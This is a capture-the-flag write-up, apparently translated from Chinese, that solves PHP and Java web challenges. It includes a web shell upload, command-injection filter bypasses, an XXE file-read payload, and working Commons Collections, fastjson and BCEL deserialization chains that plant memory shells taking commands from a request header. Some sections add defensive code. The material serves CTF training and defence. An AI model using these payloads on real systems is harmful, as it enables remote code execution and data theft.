扫扫看 (Scan it)

No need to scan; guessing flag.php is enough.

flag{094c9cc14068a7d18ccd0dd3606e532f}

debudao

The flag is in the cookie:

flag{72077a55w312584wb1aaa88888cd41af}

审计 (Audit)

```php
<?php
error_reporting(0);
include("flag.php");
highlight_file(__FILE__);

if (isset($_GET['xxs'])) {
    $input = $_GET['xxs'];

    if (is_array($input)) {
        die("错误:输入类型不允许为数组。");
    }
    if (!preg_match("/^0e[0-9]+$/", md5($input))) {
        die("错误:输入的MD5值必须以'0e'开头,并跟随数字。");
    }
    if (!is_numeric($input)) {
        die("错误:输入必须是数字。");
    }

    die("恭喜:".$flag);
} else {
    die("错误:必须设置正确参数。");
}
?>
```

Per the checks, the input must be a pure number whose MD5 is 0e followed only by digits.

The MD5 of 240610708 is 0e462097431906509019562988736854.

So requesting xxs=240610708 is enough.

flag{1bc29b36f623ba82aaf6724fd3b16718}

upload1

Only a front-end check; intercept the request and upload the file.

Then open 123.php and POST the parameter: 123=system("cat /flag.txt");

flag{adbf5a778175ee757c34d0eba4e932bc}

Dragon

Again in the cookie; what kind of challenge is this?

flag{72077a551386b19fb1aea77814cd41af}

tnl

Awful challenge: entering 3 returns a SQL error, yet the challenge has nothing to do with SQL at all. Only after reading a writeup did I learn it is just an ordinary stream-wrapper (pseudo-protocol) file read.

No wonder whatever I entered produced the twothree' error.

Source:

```php
<?php
error_reporting(0);
@$file = $_POST['twothree'];

if(isset($file))
{
    if( strpos( $file, "1" ) !== false || strpos( $file, "2" ) !== false || strpos( $file, "index")){
        include ($file . '.php');
    }
    else{
        echo "You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'twothree'' at line 1";
    }
}
```

Ridiculous.

```text
twothree=php://filter/convert.base64-encode/index/resource=flag
```
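The defensive counterpart, added here and not part of the original writeup: the include above appends '.php' to whatever is POSTed, so a php://filter wrapper reads the source instead of executing it. Mapping the request value onto a fixed allowlist (the page names one/two/index are constructed, chosen to mirror the "1", "2", "index" substrings the challenge checks) means no wrapper, path or traversal string ever reaches include().

```php
<?php
// Added example (not the challenge's code): allowlisted page include.
// Request value -> file name. Anything not in this map is rejected outright.
const PAGES = [
    'one'   => 'one.php',    // constructed page names
    'two'   => 'two.php',
    'index' => 'index.php',
];

function resolvePage(?string $requested): ?string {
    if ($requested === null || !array_key_exists($requested, PAGES)) {
        return null;                       // not in the map: no include at all
    }
    // Resolve to an absolute path and confirm it is still inside this directory,
    // so a symlink or a bad map entry cannot point elsewhere.
    $path = realpath(__DIR__ . '/' . PAGES[$requested]);
    if ($path === false || !str_starts_with($path, __DIR__ . DIRECTORY_SEPARATOR)) {
        return null;                       // file missing, or escaped the directory
    }
    return $path;
}

$page = resolvePage($_POST['twothree'] ?? null);
if ($page === null) {
    http_response_code(400);
    exit('invalid page');
}
include $page;
```

str_starts_with() needs PHP 8.0; on older PHP use strncmp() with the directory prefix length.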

flag{29dba9019e40d75a5053b15f4f2906e1}

你知道sys还能这样玩吗 (Did you know sys could be played like this?)

Great, a 403 right in the face at the start and nothing given. Guessed paths first, and sys.php had something.

```php
<?php
show_source(__FILE__);

if(isset($_POST['cmd'])){
    echo "<pre>";
    $cmd = $_POST['cmd'];
    if (!preg_match('/ls|dir|nl|nc|cat|tail|more|flag|sh|cut|awk|strings|od|curl|\*|sort|ch|zip|mod|sl|find|sed|cp|mv|ty|grep|fd|df|sudo|more|cc|tac|less|head|\.|{|}|tar|zip|gcc|uniq|vi|vim|file|xxd|base64|date|bash|env|\?|wget/i', $cmd)) {
        $output = system($cmd);
        echo $output;
    }
    echo "</pre>";
}
?>
```

It only filters some specific command strings; since the input is executed directly as a system command, bash tricks work. Here I use variable concatenation:

```text
ls /
cmd=a=l;b=s;$a$b /;
```

The root directory has flag.txt, but *, ? and . are all filtered. Square brackets are not, so use a bracket wildcard:

```text
cat /flag[^a]txt
cmd=a=ca;b=t;c=fla;d=g[^a]txt;$a$b /$c$d;
```

flag{196b0f14eba66e10fba74dbf9e99c22f}

Method 2:

Use php -r to execute PHP code, with encoding to get past the filter:

```text
cmd=php -r 'system(hex2bin("636174202f666c61672e747874"));'
```

Version without double quotes:

```text
cmd=php -r 'system(hex2bin(ff3b636174202f666c61672e747874));'
```

Method 3:

printf plus a double-quote split to get past the base64 filter:

```text
cmd=`printf "Y2F0IC9mbGFnLnR4dA=="|bas""e64 -d`
```

Method 4:

Octal escapes:

```text
cmd=$%27\143\141\164%27%3c$%27\57\146\154\141\147\56\164\170\164%27
```
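The four bypasses above all work for the same reason: the string still reaches a shell, so a blacklist regex can never be complete. As an added example (not from the original writeup, command names and working directory are constructed), the defensive rewrite accepts only a fixed command name, execs it with an argv array so no shell interprets $, [, backticks or quotes, and constrains the one optional argument:

```php
<?php
// Added example (not the challenge's code): no user text is ever handed to a shell.
const ALLOWED = [
    'list' => ['/bin/ls', '-l'],       // constructed example commands
    'date' => ['/bin/date'],
];

function runAllowed(string $name, string $arg = ''): ?string {
    if (!isset(ALLOWED[$name])) {
        return null;                     // unknown command: reject, do not "filter"
    }
    // Optional argument: a bare relative name only; no slashes, dots or metacharacters.
    if ($arg !== '' && !preg_match('/^[A-Za-z0-9_-]{1,64}$/', $arg)) {
        return null;
    }
    $argv = ALLOWED[$name];
    if ($arg !== '') {
        $argv[] = $arg;
    }
    // proc_open with an array command (PHP >= 7.4) execs the program directly;
    // there is no /bin/sh in between to expand $a$b or [^a] globs.
    $proc = proc_open($argv, [1 => ['pipe', 'w'], 2 => ['pipe', 'w']], $pipes, '/var/www/html');
    if (!is_resource($proc)) {
        return null;
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($proc);
    return $out;
}

if (isset($_POST['cmd'])) {
    $result = runAllowed($_POST['cmd'], $_POST['arg'] ?? '');
    header('Content-Type: text/plain');
    echo $result ?? "command not permitted\n";
}
```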

ExX

A directory scan found dom.php.

The error message mentions DOMDocument::loadXML().

Combined with the challenge name, guess XXE (XML external entity) injection.

Straight to the payload:

```xml
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=flagggg.php"> ]> <xml><name>&xxe;</name></xml>
```

PD9waHANCi8vZmxhZ3s3ZTk3ZThjNGY5ZDZiZTM1YWU4NTAwYjlmYjJjZGQzZX0NCg==

flag{7e97e8c4f9d6be35ae8500b9fb2cdd3e}
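The parsing side that would have made this payload inert, added here and not part of the original writeup: refuse any DOCTYPE before the XML reaches DOMDocument::loadXML(), and never enable entity substitution or DTD loading.

```php
<?php
// Added example (not the challenge's code): parse untrusted XML with no entity expansion.
function parseUntrustedXml(string $xml): ?DOMDocument {
    // A DOCTYPE is where <!ENTITY ...> declarations live; API input has no reason to carry one.
    if (preg_match('/<!DOCTYPE/i', $xml)) {
        return null;
    }
    $prevErr = libxml_use_internal_errors(true);      // collect parse errors instead of warnings
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);           // needed before PHP 8.0; default-off since
    }
    $doc = new DOMDocument();
    // LIBXML_NONET blocks network fetches during parsing. LIBXML_NOENT and LIBXML_DTDLOAD are
    // deliberately absent: with them, &xxe; above would be resolved through php://filter.
    $ok = $doc->loadXML($xml, LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($prevErr);
    return $ok ? $doc : null;
}

$doc = parseUntrustedXml(file_get_contents('php://input'));
if ($doc === null) {
    http_response_code(400);
    exit('invalid xml');
}
echo htmlspecialchars($doc->getElementsByTagName('name')->item(0)->textContent ?? '');
```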

Then the hard part was all Java =-=

CC chain (Commons Collections)

CC6 chain; the target has no outbound network, so inject a memory shell. The memory shell is given below.

```java
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.*;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import java.io.*;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

public class main {
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public static byte[] serialize(final Object obj) throws Exception {
        ByteArrayOutputStream btout = new ByteArrayOutputStream();
        ObjectOutputStream objOut = new ObjectOutputStream(btout);
        objOut.writeObject(obj);
        return btout.toByteArray();
    }

    public static Object deserialize(final byte[] serialized) throws Exception {
        ByteArrayInputStream btin = new ByteArrayInputStream(serialized);
        ObjectInputStream objIn = new ObjectInputStream(btin);
        return objIn.readObject();
    }

    public static void main(String[] args) throws Exception {
        TemplatesImpl obj = new TemplatesImpl();
        ClassPool pool = ClassPool.getDefault();
        CtClass clazz1 = pool.get(SpringEcho.class.getName());
        setFieldValue(obj, "_bytecodes", new byte[][]{clazz1.toBytecode()});
        setFieldValue(obj, "_name", "Infernity");
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
        Transformer transformer = new InvokerTransformer("getClass", null, null);
        Map innerMap = new HashMap();
        Map outerMap = LazyMap.decorate(innerMap, transformer);
        TiedMapEntry tme = new TiedMapEntry(outerMap, obj);
        HashMap expMap = new HashMap();
        expMap.put(tme, "key");
        outerMap.remove(obj);
        setFieldValue(transformer, "iMethodName", "newTransformer");
        byte[] obs = serialize(expMap);
        System.out.println(new String(Base64.getEncoder().encode(obs)));
        deserialize(obs);
    }
}
```

ezJson

fastjson-1.2.83 native deserialization; ysoserial has a ready-made exploit.

Only the echo memory shell needs to be prepared.

For how the chain is constructed, see https://www.bilibili.com/video/BV1Ds421g7pw/?vd_source=cd1ee3d9c8c623012da5b159695424ee&p=11&spm_id_from=333.788.videopod.sections

shell.class:

```java
package com.Memshell.fastjson1_nei_chun_ma;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.IOException;

public class shell extends AbstractTranslet {
    public shell() {
        try {
            org.springframework.web.context.request.RequestAttributes requestAttributes = org.springframework.web.context.request.RequestContextHolder.getRequestAttributes();
            javax.servlet.http.HttpServletRequest httprequest = ((org.springframework.web.context.request.ServletRequestAttributes) requestAttributes).getRequest();
            javax.servlet.http.HttpServletResponse httpresponse = ((org.springframework.web.context.request.ServletRequestAttributes) requestAttributes).getResponse();
            String[] cmd = new String[]{"sh", "-c", httprequest.getHeader("Infernity")}; // the command is sent in a request header named Infernity
            byte[] result = new java.util.Scanner(new ProcessBuilder(cmd).start().getInputStream()).useDelimiter("\\A").next().getBytes();
            httpresponse.getWriter().write(new String(result));
            httpresponse.getWriter().flush();
            httpresponse.getWriter().close();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws
            TransletException {
    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator,
                          SerializationHandler handler) throws TransletException {
    }
}
```

FastJsonBCEL

https://cloud.tencent.com/developer/article/2335078

The /parse route parses input with FastJson, so a deserialization vulnerability may exist.

Check pom.xml.

Note the tomcat-dbcp and fastjson dependencies, at versions 9.0.8 and 1.2.24 respectively. So FastJson can be made to load BCEL bytecode through tomcat-dbcp.

```java
import com.sun.org.apache.bcel.internal.classfile.Utility;
import com.Utils.Util;

public class test {
    public static void main(String[] args) throws Exception{
        byte[] bytes = Util.file2ByteArray("C:\\Users\\13664\\Documents\\JavaUtils\\target\\classes\\com\\Memshell\\fastjsonBCEL\\shell.class");
        String code = Utility.encode(bytes,true);
        String s = "{{\"x\":{\"@type\":\"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\",\"driverClassLoader\":{ \"@type\":\"com.sun.org.apache.bcel.internal.util.ClassLoader\"},\"driverClassName\":\"$$BCEL$$"+code+"\"}}:\"x\"}";
        System.out.println(s);
    }
}
```

shell.class:

```java
import java.lang.reflect.Method;
import java.util.Scanner;

public class shell {
    static {
        try {
            Class v0 = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.RequestContextHolder");
            Method v1 = v0.getMethod("getRequestAttributes");
            Object v2 = v1.invoke(null);
            v0 = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.ServletRequestAttributes");
            v1 = v0.getMethod("getResponse");
            Method v3 = v0.getMethod("getRequest");
            Object v4 = v1.invoke(v2);
            Object v5 = v3.invoke(v2);
            Method v6 = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.ServletResponse").getDeclaredMethod("getWriter");
            Method v7 = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.http.HttpServletRequest").getDeclaredMethod("getHeader",String.class);
            v7.setAccessible(true);
            v6.setAccessible(true);
            Object v8 = v6.invoke(v4);
            String v9 = (String) v7.invoke(v5,"Infernity"); // command taken from the request header
            String[] v10 = new String[3];
            if (System.getProperty("os.name").toUpperCase().contains("WIN")){
                v10[0] = "cmd";
                v10[1] = "/c";
            }else {
                v10[0] = "/bin/sh";
                v10[1] = "-c";
            }
            v10[2] = v9;
            v8.getClass().getDeclaredMethod("println",String.class).invoke(v8,(new Scanner(Runtime.getRuntime().exec(v10).getInputStream())).useDelimiter("\\A").next());
            v8.getClass().getDeclaredMethod("flush").invoke(v8);
            v8.getClass().getDeclaredMethod("clone").invoke(v8);
        } catch (Exception var11) {
            var11.getStackTrace();
        }
    }
}
```
